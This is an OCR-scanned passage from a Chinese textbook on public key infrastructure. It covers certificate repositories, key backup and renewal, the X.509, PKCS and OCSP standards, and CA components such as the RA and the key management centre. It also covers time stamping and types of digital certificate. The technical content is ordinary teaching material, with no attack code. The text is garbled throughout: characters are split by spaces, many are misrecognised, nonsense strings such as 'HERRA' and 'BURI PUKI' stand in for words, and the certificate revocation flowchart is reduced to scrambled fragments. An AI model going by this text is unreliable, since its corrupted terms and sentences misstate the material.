(2) 证 书 和 证 书库 。 证 书 是 数字 证 书 或 电子 证 书 的 简称 , 它 符合 X. 509 标准 ,是 网 上 实 
体 身份 的 证 明 。 证 书 是 由 具备 权威 性 、 可 信任 性 和 公正 性 的 第 三 方 机 构 签发 的 ,因此 , 它 是 
权威 性 的 电子 文档 。 

证 书库 是 CA 颁发 证 书 和 撤销 证 书 的 集中 存放 地 ,可 供 公众 进行 开放 式 查 询 。 一 般 来 
说 ,查询 的 目的 有 两 个 : 其 一 是 想得到 与 之 通信 实体 的 公 钥 ; 其 二 是 要 验证 通信 对 方 的 证 
书 是 否 已 进入" 黑 名单 ”。 证 书库 支持 分 布 式 存放 , 即 可 以 采用 数据 库 镜像 技术 ,将 CA 签发 
的 证 书 中 与 本 组 织 有 关 的 证 书 和 证 书 撤销 列表 存放 到 本 地 ,以 提高 证 书 的 查询 效率 ,减少 向 
总 目录 查询 的 瓶颈 。 

(3) 密 钥 备份 及 恢复 ,是 密 钥 管理 的 主要 内 容 。 如 果 用 户 解密 数据 的 密 钥 丢失 ,已 被 加 
密 的 密 文 将 无 法 解 开 。 为 避免 这 种 情况 的 发 生 ,PKI 提供 了 密 钥 备份 与 密 钥 恢 复 机 制 : 当 
用 户 证 书生 成 时 ,加 密 密 钥 即 被 CA 备份 存储 ; 当 需 要 恢复 时 ,用 户 只 需 向 CA 提出 申请 ， 
CA 就 会 为 用 户 自动 进行 恢复 。 

(4) 密 钥 和 证 书 的 更 新 。 一 个 证 书 的 有 效 期 是 有 限 的 ,这 种 规定 在 理论 上 是 基于 当前 
非 对 称 算法 和 密 钥 长 度 的 可 破译 性 分 析 ; 在 实际 应 用 中 是 由 于 长 期 使 用 同一 个 密 钥 有 被 破 
译 的 危险 。 因 此 ,证 书 和 密 钥 必 须 有 一 定 的 更 换 频 度 ,PKI 对 已 发 的 证 书 进行 密 钥 更 新 或 证 
书 更 新 。 

证 书 更 新 一 般 由 PKT 系统 自动 完成 ,不 需要 用 户 干预 。 用 户 在 使 用 证 书 的 过 程 中 ,PKI 
会 自动 到 目录 服务 器 中 检查 证 书 的 有 效 期 , 当 有 效 期 结束 之 前 ,PKI/CA 会 自动 生成 一 个 新 
证 书 来 代替 旧 证 书 。 

O 证 书 历史 档案 。 从 密 钥 更 新 的 过 程 不 难看 出 ,经 过 一 段 时 间 后 ,每 一 个 用 户 都 会 形 
成 多 个 旧 证 书 和 至 少 一 个 当前 新 证 书 , 这 一 系列 旧 证 书 和 相应 的 私 钥 就 组 成 了 用 户 密 钥 和 
证 书 的 历史 档案 。 记 录 整 个 密 钥 历史 是 非常 重要 的 。 例 如 ,用 户 几 年 前 用 自己 的 公 钥 加 密 
的 数据 无 法 用 现在 的 私 钥 解密 ,那么 该 用 户 就 必须 从 他 的 密 钥 历史 档案 中 ,查找 到 几 年 前 的 
私 钥 来 解密 数据 。 

(6) 客户 端 软件 。 为 方便 客户 操作 ,解决 PKI 的 应 用 问题 ,在 客户 端 装 有 客户 端 软件 ， 
以 实现 数字 签名 ,加密 传输 数据 等 功能 。 

(7) 交叉 认证 。 交 叉 认证 就 是 多 个 PKI 域 之 间 实 现 互 操作 。 


4. PKI 的 相关 标准 
从 整个 PKI 体 系 建立 与 发 展 的 历程 来 看 ,与 PKI 相关 的 标准 主要 如 下 。 
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(1) X.509(1993) 信 息 技 术 的 开放 系统 互联 (鉴别 框架 )。X. 509 是 由 国际 电信 联盟 
(TU-T) 制 定 的 数字 证 书 标准 。 在 X. 500 确保 用 户 名 称 唯一 性 的 基础 上 ,X. 509 为 X. 500 
用 户 名 称 提 供 了 通信 实体 的 鉴别 机 制 ,并 规定 了 实体 鉴别 过 程 中 适用 的 证 书 语法 和 数据 接 
H. X. 509 证 书 由 用 户 公共 密 钥 和 用 户 标识 符 组 成 ,此 外 还 包括 版 本 号 .证 书 序列 号 `CA 
标识 符 、 签 名 算法 标识 、 签 发 者 名 称 .证 书 有 效 期 等 信息 。 

(2) PKCS 系列 标准 。 由 RSA 实验 室 制定 的 PKCS 系列 标准 ,是 一 套 针对 PKI 体系 的 
加 解密 、 签 名 、 密 钥 交换 、 分 发 格式 及 行为 标准 ,该 标准 目前 已 经 成 为 PKI 体系 中 不 可 缺少 
的 一 部 分 。 

(3) OCSP 在 线 证 书 状 态 协议 。OCSP(online certificate status protocol) 是 IETF 颁布 
的 用 于 检查 数字 证 书 在 某 一 交易 时 刻 是 否 仍然 有 效 的 标准 。 该 标准 提供 给 PKT 用 户 一 条 方便 
快捷 的 数字 证 书 状态 查询 通道 ,使 PKI 体系 能 够 更 有 效 ,更 安全 地 在 各 个 领域 被 广泛 应 用 。 


5. PKI 的 应 用 


PKI 的 应 用 如 下 。 

CD. 虚拟 专用 网 络 (virtual private network. VPN) ,是 将 物理 分 布 在 不 同 地 点 的 网 络 通 
过 Internet 连接 而 成 的 逻辑 上 的 虚拟 子 网 。 通 常 ,VPN 利用 PKI 与 PMI 和 访问 控制 技术 
来 提高 其 安全 性 ,一 个 现代 VPN 需要 认证 、 机 密 、 完 整 ,不 可 否认 等 更 加 完善 的 安全 技术 。 
PKI 技术 已 经 成 为 构架 VPN 的 基础 ,为 路 由 器 之 间 、PKI 与 PMI 之 间或 路 由 器 和 PKI 与 
PMI 之 间 提 供 经 过 加 密 和 认证 的 通信 。 

(2) 安全 电子 邮件 ,已 经 成 为 一 种 标准 信息 交换 工具 ,其 安全 需求 是 完整 ,认证 和 不 可 
和 否认。 利用 PKI 技术 ,用 户 可 以 对 他 所 发 的 邮件 进行 数字 签名 。 安 全 电子 邮件 协议 
S/MIME(the secure multipurpose Internet mail extension) ,是 一 个 加 密 和 签名 邮件 的 协 
议 , 它 的 实现 依赖 于 PKI 技术 。 

(3) Web 上 的 交易 的 安全 问题 包括 诈骗 ,泄露 . 自 改 攻击。 解决 Web 安全 问题 ,入 手 
点 是 浏览 器 。 现 在 ,IE 和 Firefox 都 支持 SSL(the secure sockets layer) 协 议 ,SSL 是 一 个 在 
传输 层 和 应 用 层 之 间 的 安全 通信 层 。 利 用 PKI 技 术 ,SSL 协议 允许 在 浏览 器 和 服务 器 之 间 
进行 加 密 通 信 。 


4.2.2 证 书 权威 


证 书 权威 (CA) 是 构建 在 PKI 基础 之 上 的 产生 和 确定 数字 证 书 的 第 三 方 可 信 机 构 
(trusted third party) ,主要 进行 身份 证 书 的 发 放 , 管 理 电子 证 书 的 正常 使 用 。CA 具有 权威 
性 ,可 信赖 性 及 公正 性 ,承担 公 钥 体系 中 公 钥 的 合法 性 检验 工作 。CA 为 每 个 使 用 公开 密 角 
的 用 户 发 放 一 个 数字 证 书 ,证 书 的 作用 是 证 明证 书 中 列 出 的 用 户 合法 拥有 证 书 中 列 出 的 公 
FEH. CA 的 数字 签名 使 得 攻击 者 不 能 伪造 和 算 改 证 书 ,CA 还 负责 吊销 证 书 并 发 布 证 书 
吊销 列表 (CRL) ,并 负责 产生 ,分 配 和 管理 网 上 实体 所 需 的 数字 证 书 。 


1. CA 的 功能 和 组 成 


1) CA 认证 体系 的 组 成 
CA 认证 体系 的 组 成 如 下 。Q@CA 负责 产生 和 确定 用 户 实体 的 数字 证 书 。@@ 审 核 授权 
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部 门 ,简称 RA, 负 责 对 证 书 的 申请 者 进行 资格 审查 ,并 决定 是 否 同意 给 申请 者 发 放 证 书 ; 同 
时 ,承担 因 审 核 错误 而 引起 的 、 为 不 满足 资格 的 人 发 放 了 证 书 而 引起 的 一 切 后 果 , 它 应 由 能 
够 承担 这 些 责 任 的 机 构 担 任 。@ 证 书 操作 部 门 (certification processor,CP) 为 已 被 授权 的 
申请 者 制作 ,发 放 和 管理 证 书 , 并 承担 因 操 作 运营 错误 所 产生 的 一 切 后 果 , 包 括 失 密 和 为 没 
有 获得 授权 的 人 发 放 了 证 书 等 , 它 可 由 RA 自己 担任 ,也 可 委托 给 第 三 方 担任 。@ 密 钥 管 理 
部 门 (KM) ,负责 产 生 实体 的 加 密 钥 对 ,并 对 其 解密 私 钥 提 供 托 管 服务 。@ 证 书 存储 地 
(dir) ,包括 网 上 所 有 的 证 书目 录 。 

在 CA 认证 体系 中 ,各 组 成 部 分 彼此 之 间 的 认证 关系 一 般 如 下 。 

(1) 用 户 与 RA 之 间 : 用 户 请 求 RA 进行 审核 ,用 户 应 该 将 自己 的 身份 信息 提交 给 
RA,RA 对 用 户 的 身份 进行 审核 后 ,要 安全 地 将 该 信息 转发 给 CA。 

(2) RA 与 CA 之 间 : RA 应 该 以 一 种 安全 可 靠 的 方式 把 用 户 的 身份 识别 信息 传送 给 
CA, CA 通过 安全 可 行 的 方式 将 用 户 的 数字 证 书 传送 给 RA 或 直接 送 给 用 户 。 

(3) 用 户 与 dir 之 间 : 用 户 可 以 在 DIR 中 查询 ,撤销 证 书 列 表 和 数字 证 书 。 

(4) dir 与 CA 之 间 : CA 将 自己 产生 的 数字 证 书 直 接 传送 给 目录 dir, 并 把 它们 登记 在 
目录 中 ,在 目录 中 登记 数字 证 书 要 求 用 户 鉴 别 和 访问 控制 。 

(5) 用 户 与 KM 之 间 : KM 接受 用 户 委托 ,代表 用 户 生 成 加 密 密 钥 对 ; 用 户 所 持 证 书 的 
加 密 密 钥 必须 委托 密 钥 管理 中 心 生成 ; 用 户 可 以 申请 解密 私 钥 恢 复 服 务 ; KM 应 该 为 用 户 
提供 解密 私 钥 的 恢复 服务 。 用 户 的 解密 私 钥 必 须 统一 在 密 钥 管理 中 心 托管 。 

(6) CA 5 KM 之 间 : 二 者 之 间 的 通信 是 保密 、 安 全 的 ,它们 之 间 用 通信 证 书 来 保证 安 
全 性 。 通 信 证 书 是 认证 机 关 与 密 钥 管理 中 心 上 级 或 下 级 认证 机 关 进 行 通信 时 使 用 的 计算 
机 设备 证 书 ,这 些 专 用 的 计算 机 设备 必须 安装 认证 机 构 所 发 布 的 专用 通信 证 书 , 密 钥 管理 中 
心 、 上 级 或 下 级 认证 机 构 专用 通信 计算 机 设备 所 持 有 的 通信 密 钥 证 书 和 认证 机 构 的 根 证 书 。 

2) 认证 体系 的 职责 

从 上 述 论 述 中 ,可 以 总 结 出 ,CA 至 少 担负 着 以 下 几 项 具体 的 职责 : 验证 并 标识 公开 密 
钥 信 息 提交 认证 的 实体 的 身份 ; 确保 用 于 产生 数字 证 书 的 非 对 称 密 钥 对 的 质量 ; 保证 认证 
过 程 和 用 于 签名 公开 密 钥 信息 的 私有 密 钥 的 安全 ; 确保 两 个 不 同 的 实体 未 被 赋予 相同 的 身 
份 , 以 便 把 它们 区 别 开 来 ; 管理 包含 于 公开 密 钥 信息 中 的 证 书 材料 信息 ,例如 数字 证 书 序列 
号 .认证 机 构 标 识 等 ; 维护 并 发 布 撤销 证 书 列表 ; 指定 并 检查 证 书 的 有 效 期 ; 通知 在 公开 密 
钥 信 息 中 标识 的 实体 ,数字 证 书 已 经 发 布 ; 记录 数字 证 书 产生 过 程 的 所 有 步 又。 

3) 安全 认证 体系 的 功能 

CA 安全 认证 体系 的 主要 功能 包括 : 签发 数字 证 书 、 管 理 下 级 审核 注册 机 构 ,接受 下 级 
审核 注册 机 构 的 业务 申请 、 维 护 和 管理 所 有 证 书目 录 服 务 .向 密 钥 管理 中 心 申请 密 钥 .实体 
鉴别 密 钥 器 的 管理 等 。 


2. CA 自身 证 书 的 管理 


CA 自身 证 书 的 管理 功能 主要 包括 以 下 内 容 。 

。 自身 证 书 的 查询 。PKI CA 具有 报表 功能 , 它 能 够 在 CA 中 产生 一 个 用 户 清单 ,用 户 
可 以 使 用 这 一 工具 对 所 有 CA 的 证 书 和 状态 进行 查询 。 

。 CRL 查询 。 通 过 特定 的 应 用 程序 和 工具 包 , 可 以 访问 CRL。 
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* 查询 操作 日 志 。PKI 安装 了 审计 跟踪 文件 ,提供 了 一 个 非常 广泛 的 存档 和 审计 能 
力 ,用 于 记录 涉及 认证 的 所 有 日 常 交 易 , 包 括 管理 员 注册 和 注销 以 及 用 户 初始 化 等 。 
每 个 审计 记录 是 自动 创建 的 ,管理 员 可 以 查询 所 有 审计 记录 ,但 不 能 修改 。 

。 统计 报表 输出 。PKI 提供 了 创建 报表 的 灵活 方法 ,包括 固定 格式 和 自 定义 格式 的 报 
表 。 这 些 报表 内 容 可 以 是 统计 各 类 用 户 表 单 ,或 有 关 用 户 密 钥 恢复 的 信息 等 。 


3. CA 对 用 户 证 书 的 管理 


如 果 用 户 想 得 到 一 份 证 书 , 他 首先 需要 向 CA 提出 申请 。CA 对 申请 者 的 身份 进行 认 
证 后 ,由 用 户 或 CA 生成 一 对 密 钥 , 私 钥 由 用 户 妥善 保存 ,CA 将 公 钥 与 申请 者 的 相关 信息 
绑 定 ,并 签名 ,形成 证 书 发 给 申请 者 。 如 果 用 户 想 验证 CA 签发 的 另 一 个 证 书 ,可 以 用 CA 
的 公 钥 对 此 证 书 上 的 签名 进行 验证 ,一 旦 验证 通过 ,该 证 书 就 认为 是 有 效 的 。CA 除了 签发 
证 书 外 ,还 负责 证 书 和 密 钥 的 管理 。 


4. 密 钥 管理 和 密 钥 管理 中 心 


1) 密 钥 管理 

密 钥 管理 是 数据 加 密 技术 中 的 重要 一 环 , 密 钥 管 理 的 目的 是 确保 密 钥 的 安全 人 性 。 

一 个 好 的 密 钥 管理 系统 应 该 做 到 : 密 钥 难 以 被 窃取 ; 在 一 定 条 件 下 窃取 了 密 钥 也 没有 
用 , 密 钥 有 使 用 范围 和 时 间 的 限制 ; 密 钥 的 分 配 和 更 换 过 程 对 用 户 透明 ,用 户 不 一 定 要 亲自 
掌管 密 钥 。 

2) 密 钥 管理 中 心 

密 钥 管理 中 心 (key management center. KMC) 

向 CA 服务 提供 相关 密 钥 服务 ,如 密 钥 生成 、 密 钥 存 
储 、 密 钥 备份 . 密 钥 恢 复 、 密 钥 更 新 和 密 钥 销毁 等 ,如 | 
图 4-16 所 示 。 

(D 密 钥 生成 。KMC 最 重要 的 职能 就 是 为 用 户 
产生 加 密 密 钥 对 并 提供 解密 私 钥 的 托管 服务 ,加 密 密 
钥 对 的 产生 是 在 独立 的 设备 中 产生 ,支持 在 线 生成 和 图 4-16 密 钥 管理 中 心 构成 
离线 密 钥 池 方 式 。 

CD 认证 机 构 将 证 书 序列 号 、 法 人 实体 的 验证 签名 公 钥 及 法 人 相关 信息 提交 给 KMC, 请 
SRK KMC 代 法 人 产生 加 密 密 钥 对 。 认 证 机 构 的 密 钥 生成 请 求 信息 包括 法 人 永久 性 ID 实体 
鉴别 密码 器 M( 可 选 ) .证 书 服务 编号 (可 选 ) . 密 钥 长 度 。 

@ KMC 在 收 到 认证 机 构 提交 的 密 钥 对 产生 请 求 后 立即 产生 加 密 密 钥 对 。 

@ KMC 向 CA 中 心 返回 处 理 结果 ,包括 加 密 公 钥 、 经 加 密 的 解密 私 钥 .KMC 对 密 钥 对 
的 签名 。 

密 钥 对 的 产生 ,有 两 种 方式 :签名 密 钥 使 用 者 自己 产生 ,此 方式 可 以 保证 只 有 使 用 者 自 
己 知道 密 钥 ,不 会 泄露 给 第 三 者 。 在 CA 中 心 产生 加 密 密 钥 ,在 实体 的 保护 下 将 密 钥 交 给 使 
用 者 ,并 将 产生 密 钥 有 关 的 数据 及 密 钥 本 身 销 毁 。 

当 用 户 证 书生 成 后 ,用 户 信息 通过 RA 上 传 到 KMC, 与 加 密 密 钥 一 起 存 到 当前 库 进 行 
托管 保存 ,以 便 以 后 查询 和 恢复 操作 。 所 有 的 托管 密 钥 都 必须 以 分 割 和 加 密 的 方式 保存 在 
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密 钥 数据 库 服务 器 中 。 

(2) 密 钥 存储 。 双 证 书 绑 定 同 一 个 用 户 ,其 对 应 的 私 钥 通过 硬件 介质 保 在。 签名 证 书 
的 私 钥 是 用 户 自己 产生 ,因此 ,信任 方 完全 可 以 相信 经 过 签名 证 书 中 所 包含 的 公 钥 所 验证 过 
的 信息 是 确实 经 过 证 书 所 绑 定 的 实体 签 过 名 的 ,这 保证 了 信息 的 完整 性 和 不 可 抵赖 性 。 然 
而 ,加 密 证 书 的 私 钥 由 KMC 产生 ,并 在 该 机 构 的 数据 库 中 备份 了 用 户 的 私 钥 , 实 现 用 户 密 
钥 的 托管 。 在 这 种 情 帝 下, 用户 和 KMC 都 拥有 用 户 加 密 证 书 所 对 应 的 私 钥 。 

用 户 本 地 存储 私 钥 ,口令 加 密 保 存 ; 当 需要 使 用 私 钥 时 ,输入 口令 , 读 取 相 应 私 钥 进行 
相应 的 操作 。 用 户 公 钥 明文 和 用 户 信息 存储 在 一 个 数据 表 中 , 私 钥 经 过 加 密 , 可 以 采用 根 
CA 公 钥 进行 加 密 ,存储 于 另 一 表 中 ,其 读 取 应 输入 相应 管理 员 口 令 , 公 钥 与 私 钥 可 以 通过 
ID 进行 联系 。 

(3) 密 钥 传输 。 用 户 提 交 申 请 信息 ,同时 在 用 户 端 产生 签名 公 钥 与 私 钥 , 公 钥 经 过 加 密 
上 传 给 CA 中 心 ,经 审核 后 ,产生 双 证 书 , 使 用 该 用 户 的 签名 公 钥 进行 加 密 , 返 回 给 用 户 , 可 
以 使 用 网 站 挂 起 或 者 经 过 用 户 邮 箱 进行 发 送 。 

(4) 密 钥 备份 。 

(D 冷 备 (cold standby) ,通常 是 通过 定期 地 对 生产 系统 数据 库 进行 备份 ,并 将 备份 数据 
存储 在 磁盘 等 介质 。 备 份 数据 平时 处 于 一 种 非 激 活 的 状态 ,直到 故障 发 生 导 致 生产 数据 库 
系统 不 可 用 , 才 激活 。 

© 热 备 (warm standby) ,通常 需要 一 个 备用 的 数据 库 系统 。 与 冷 备 相 似 ,只 不 过 当 生 
产 数据 库 发 生 故 障 时 ,可 以 通过 备用 数据 库 的 数据 进行 业务 恢复 。 因 此 , 热 备 的 恢复 时 间 比 
冷 备 大 大 缩短 。 

冷 备 采用 硬件 实现 ,不 需要 单独 写 代码 。 热 备 每 天 定时 对 当天 的 数据 进行 备份 ,备份 广 
件 经 过 口令 加 密 , 与 存储 相同 , 公 钥 与 私 钥 分 开 备份 ,都 要 进行 基本 的 口令 加 密 , 其 间 通 过 
ID 进行 相应 操作 。 

(5) 密 钥 和 证 书 的 更 新 。 证 书 更 新 的 过 程 和 证 书签 发 非常 相似 ,因为 用 户 只 是 更 新 证 
书 , 他 在 申请 证 书 时 已 经 通过 了 审核 ,在 证 书 更 新 时 ,不 再 需要 审核 过 程 。 

(D CA 可 依 其 实际 的 需要 ,对 于 新 旧 证 书 的 有 效 期 限 ,制定 自己 的 策略 。 前 后 证 书 的 其 
限 可 以 重 双 或 不 重 蕉 。 若 允许 有 效 期 重 又 ,可 以 避免 CA 可 能 在 同一 失效 期 限 必须 重新 答 
发 大 量 的 证 书 问题 。 

@ 已 逾期 的 证 书 必须 从 目录 服务 中 删除 。 但 认证 中 心 若是 有 提供 不 可 否认 (non- 
repudiation) 服 务 时 ,认证 中 心 必须 将 旧 的 证 书 保存 一 段 时 间 , 以 备 将 来 有 争议 时 ,验证 签名 
解决 争议 之 用 。 

(6) 查询 。OCSP 是 一 个 简单 的 请 求 /响应 协议 , 它 使 得 客户 端 应 用 程序 可 以 测定 所 需 
验证 证 书 体 系 的 状态 。 一 个 OCSP 客户 端 发 送 一 个 证 书 状态 查询 给 一 个 OCSP 响应 器 ,等 
待 响应 器 返回 一 个 响应 。 

协议 对 OCSP 客户 端 和 OCSP 响应 器 之 间 所 需要 交换 的 数据 进行 了 描述 。 一 个 OCSP 
请 求 包含 协议 版 本 ,服务 请 求 .目标 证 书 标识 和 可 选 的 扩展 项 等 。OCSP 响应 器 对 收 到 的 请 
求 返回 一 个 响应 或 出 错 信息 、 或 确定 的 回复 ); OCSP 响应 器 返回 出 错 信息 时 ,该 响应 不 用 
签名 ; 响应 器 返回 确定 的 回复 ,该 响应 必须 进行 数字 签名 。 在 对 每 一 张 被 请 求证 书 的 回复 
中 包含 有 证 书 状 态 值 : 正常 撤销. 未知.“ 正 常 ?状态 表示 这 张 证 书 没有 被 撤销 ,撤销 ? 状 
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态 表示 证 书 已 被 撤销 ,未 知 " 状 态 表示 响应 器 不 能 判断 请 求 的 证 书 状 态 。 

(7) 注销 。 当 有 一 些 特殊 状况 时 ,CA 必须 停止 某 些 证 书 的 使 用 ,注销 此 证 书 。 例 如 使 
用 者 在 证 书 有 效 期 未 满 之 前 ,自觉 其 密 钥 不 安全 ,或 是 CA 对 此 使 用 者 已 丧失 管辖 权 等 状 

证 书 注销 主要 是 改变 用 户 证 书 在 CA 数据 库 中 的 状态 。 将 证 书 正 常 有 效 的 状态 改变 为 
撤销 的 状态 ,同时 从 证 书 发 布 表 中 将 该 证 书 项 删除 ,在 证 书 撤销 列表 中 增加 该 证 书 项 即 完成 
了 该 证 书 的 撤销 。 

下 载 根 证 书 用 户 发 送 个 人 信息 ,产生 签名 公 钥 、 私 钥 。 私 钥 经 过 用 户口 令 加 密 本 地 保 
存 , 公 钥 经 过 CA 根 证 书 加 密 后 ,发 送 用 户 信息 审核 ,未 通过 信息 保存 到 数据 失败 列表 ,审核 
通过 信息 发 送 到 KMC。 离 线 产生 加 密 公私 钥 对 ,公私 钥 进 行 存储 : 公 钥 与 用 户 信息 明文 存 
储 , 私 钥 加 密 存 储 , 查 找 通过 口令 和 ID 进行 备份 ; 用 户 签名 公 钥 ,用 户 信息 以 及 用 户 的 加 密 
公 钥 一 起 存储 ,加 密 私 钥 通 过 根 证 书 加 密 以 后 备份 于 另 一 数据 表 中 ,加 密 公私 钥 使 用 用 户 个 
人 的 签名 公 钥 加 密 后 返回 给 用 户 。 网 站 上 挂 起 发 送 用 户 邮箱 ,用 户 使 用 硬件 ,自己 在 中 心 取 
得 吊销 证 书 、. 生 成 吊销 列表 ,查询 证 书 状 态 ,更改 数 据 表 、 密 钥 恢 复读 取 备份 ,恢复 密 钥 原 系 
统 , 查 询 功能 基本 完成 。 对 证 书 不 了 解 的 用 户 ,注册 时 ,向 CA 中 心 发 送 签名 密 钥 ,由 根 证 书 
公 钥 自动 完成 加 密 操 作 ,用 户 查 询 其 他 用 户 公 钥 并 下 载 时 ,使 用 户 在 中 心 存储 的 加 密 公 钥 进 
行 加 密 , 防 止 公 钥 在 传输 过 程 中 被 算 改 。 证 书 注销 流程 如 图 4-17 所 示 。 


下 载 根 证 书 
re] 私 钥 经 过 用 户口 令 加 密 本 地 保存 


用 户 发 送 个 人 信息 ， 产 生 签名 公 钼 、 私 钥 3] 


—— 公 钥 经 过 CA 根 证 书 加 密 后 发 送 


信息 保 密 钥 恢 复 | 
存 到 失 i 备份 : 用 户 签名 公 钥 ， 
败 列表 Wars L| 与 用 户 信息 以 及 用 户 
读 取 备份 的 加 密 公 钥 一 起 存储 ， 
i 加 密 私 钥 通过 根 证 书 
[7027 加 密 以 后 备份 于 另 一 
[信息 发 送 到 KMC， 离 线 产生 加 密 公私 铀 数据 表 中 
| 公 铀 与 用 户 信息 明 mtus 
对 公私 铀 文 存储 
进行 存储 
私 钥 加 密 存储 ， 查 找 ! 
通过 口令 和 ID 进行 | 十 一 | 查询 让 书 状 态 
1 Niger 1 
加 密 公 私 铀 使 用 用 户 个 人 的 | se 更 改 数据 表 
EZAN 密 后 返回 给 用 户 
签名 公 钥 加 密 后 返回 给 用 上 Mee | 
用 户 使 用 硬件 a 
— 自己 在 中 心 取 
得 


图 4-17 证 书 注销 的 流程 
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5. HERRA 


上 时间 戳 是 一 个 具有 法 律 效力 的 电子 凭证 ,是 各 种 类 型 的 电子 文件 (数据 文件 ) 在 时 间 、 权 
属 及 内 容 完 整 性 方面 的 证 明 。 时 间 戳 能 证 明 用 户 在 什么 时 间 拥有 一 个 什么 样 的 电子 文件 
(数据 电文 )。 

时 间 截 主要 用 在 商业 秘密 保护 .工作 文档 的 责任 认定 .著作权 保护 .原创 作品 .软件 代 
码 、 发 明 专利 .学术 论文 .试验 数据 ,电子 单据 等 方面 。 时 间 惟 的 颁发 ,必须 要 由 可 信 的 第 三 
方 时 间 戳 服务 机 构 提 供 可 信赖 的 且 不 可 抵赖 的 时 间 戳 服务 ,其 产生 的 时 间 戳 才 具 有 法 律 效 
力 。 时 间 戳 服务 中 心 (time stamp authority,TSA) 由 国家 授时 中 心 与 权威 第 三 方 公共 时 间 
BURI PUKI: F Ei. 

上 时间 戳 服务 是 时 间 惟 服务 中 心 通 过 我 国法 定时 间 源 和 现代 密码 技术 相 结 合 而 提供 的 一 
种 第 三 方 服务 ,时 间 惟 有效 证 明了 数据 电文 (电子 文件 ) 产 生 的 时 间 及 内 容 完 整 性 ,解决 了 数 
据 电文 (电子 文件 ) 的 内 容 和 时 间 易 被 人 为 自 改 ,证据 效 力 低 . 当 事 人 举证 困难 的 问题 ,按照 
《中 华人 民 共 和 国电 子 签名 法 ) 的 有 关 规 定 , 加 盖 了 时 间 蕉 的 数据 电文 (电子 文件 ) 可 以 作为 
有 效 的 法 律 证 据 , 达 到 “不 可 否认 ”或 “ 抗 抵赖 ”的 目的 。 


6. CA 产品 简介 
CA 产品: 中国 数字 认证 网 (www. ca365. com)、 国 富安 电子 商务 安全 认证 (www. 


glapki. com. cn), 


4.2.3 数字 证 书 和 CRI 
1. 数字 证 书 的 定义 


数字 身份 认证 是 基于 国际 PKI 标 准 的 网 上 身份 认证 系统 ,数字 证 书 相当 于 网 上 的 身份 
证 , 它 以 数字 签名 的 方式 通过 第 三 方 权威 认证 有 效 地 进行 网 上 身份 认证 ,帮助 各 个 实体 识 
别 对 方 身份 和 表明 自身 的 身份 ,具有 真实 性 和 防 抵赖 功能 。 与 物理 身份 证 不 同 的 是 , 数 
字 证 书 还 具有 安全 、 保 密 、 防 自 改 的 特性 ,可 对 企业 网 上 传输 的 信息 进行 有 效 保护 和 安全 
的 传递 。 


2. 数字 证 书 的 类 型 


从 数字 签名 使 用 对 象 的 角度 ,目前 的 数字 证 书 类 型 主要 包括 个 人 身份 证 书 、 企 业 机 构 身 
份 证 书 , 支 付 网 关 证 书 、 服 务 器 证 书 ,安全 电子 邮件 证 书 、 个 人 代码 签名 证 书 。 这 些 数字 证 书 
竺 点 各 有 不 同 。 

从 数字 证 书 的 技术 角度 分 ,CA 中 心 发 放 的 证 书 分 为 两 类 : SSL 证 书 和 SET 证 书 。 
SSL 证 书 是 服务 于 银行 对 企业 或 企业 对 企业 的 电子 商务 活动 的 ; SET( 安 全 电子 交易 ) 证 书 
则 服务 于 持 卡 消费 、 网 上 购物 。 虽然 它们 都 是 用 于 识别 身份 和 数字 签名 的 证 书 , 但 它们 的 信 
任 体系 完全 不 同 ,而 且 所 符合 的 标准 也 不 一 样 。 简 单 地 说 ,SSL 数字 证 书 的 功能 作用 是 通 
过 公开 密 钥 证 明 持 证 人 的 身份 ,SET 证 书 的 作用 是 通过 公开 密 钥 证 明 持 证 人 在 指定 银行 确 
实 拥有 该 信用 卡 账 号 ,同时 也 证 明了 持 证 人 的 身份 。 
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(1) 个 人 身份 证 书 : 符合 X. 509 标准 的 数字 安全 证 书 ,证 书 中 包含 个 人 身份 信息 和 个 
人 的 公 钥 ,用 于 标识 证 书 持 有 人 的 个 人 身份 。 数 字 安 全 证 书 和 对 应 的 私 钥 存储 于 E-key 
中 ,用 于 个 人 在 网 上 进行 合同 签订 订单 .录入 审核 .操作 权限 ,支付 信 息 等 活动 中 标明 身份 。 

(2) 企业 机 构 身 份 证 书 : 符合 X. 509 标准 的 数字 安全 证 书 , 证 书 中 包含 企业 信息 和 企 
业 的 公 钥 ,用 于 标识 证 书 持 有 企业 的 身份 。 数 字 安全 证 书 和 对 应 的 私 钥 存储 于 E-key 或 IC 
卡 中 ,可 以 用 于 企业 在 电子 商务 方面 的 对 外 活动 ,如 合同 签订 .网 上 证 券 交易 、 交 易 支付 信息 
等 方面 。 

(3) 支付 网 关 证 书 , 是 证 书签 发 中 心 针 对 支付 网 关 签发 的 数字 证 书 , 是 支付 网 关 实 现 数 
据 加 解密 的 主要 工具 ,用 于 数字 签名 和 信息 加 密 。 支 付 网 关 证 书 仅 用 于 支付 网 关 提供 的 服 
务 (Internet 上 各 种 安全 协议 与 银行 现 有 网 络 数据 格式 的 转换 ) 。 

(4) 服务 器 证 书 : X. 509 标准 的 数字 安全 证 书 , 证 书 中 包含 服务 器 信息 和 服务 器 的 公 
钥 , 在 网 络 通信 中 用 于 标识 和 验证 服务 器 的 身份 。 数 字 安 全 证 书 和 对 应 的 私 钥 存储 于 
E-key 中 。 服 务 器 软件 利用 证 书 机 制 保证 与 其 他 服务 器 或 客户 端 通信 时 双方 身份 的 真实 
性 、 安 全 性 、 可 信任 度 等 。 

(5) 企业 机 构 代 码 签名 证 书 , 是 CA 中 心 签发 给 软件 提供 商 的 数字 证 书 , 包 含 软件 提供 
商 的 身份 信息 , 公 钥 及 CA 的 签名 。 软 件 提供 商 使 用 代码 签名 证 书 对 软件 进行 签名 后 放 到 
Internet. 上 , 当 用 户 在 Internet. 上 下 载 该 软件 时 将 会 得 到 提示 ,从 而 可 以 确信 : 软件 的 来 源 ; 
软件 自 签名 后 到 下 载 前 ,没有 遭 到 修改 或 破坏 。 代 码 签名 证 书 可 以 对 32-bit. exe、. cab, 
. ocx,. class 等 程序 和 文件 进行 签名 。 

(6) 安全 电子 邮件 证 书 : 符合 X. 509 标准 的 数字 安全 证 书 ,通过 IE sk Netscape H 
请 ,用 正 申 请 的 证 书 存储 于 Windows 的 注册 表 中 ,用 Netscape 申请 的 存储 于 个 人 用 户 目 
录 下 的 文件 中 。 用 于 安全 电子 邮件 或 向 需要 客户 验证 的 Web 服务 器 (https 服务 ) 表 明 
身份 。 

C) 个 人 代码 签名 证 书 , 是 CA 中 心 签发 给 软件 提供 人 的 数字 证 书 , 包 含 软件 提供 个 人 
